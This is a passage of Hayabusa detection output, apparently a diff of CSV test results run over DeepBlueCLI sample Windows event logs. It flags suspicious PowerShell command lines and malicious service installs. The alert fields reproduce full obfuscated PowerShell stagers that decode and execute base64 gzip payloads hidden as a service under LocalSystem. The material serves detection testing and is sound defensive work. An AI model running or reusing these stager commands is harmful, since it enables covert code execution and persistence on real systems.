dO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:36:10.592 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA=='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:38:04.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xc40 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:38:04.087 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:38:04.643 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WB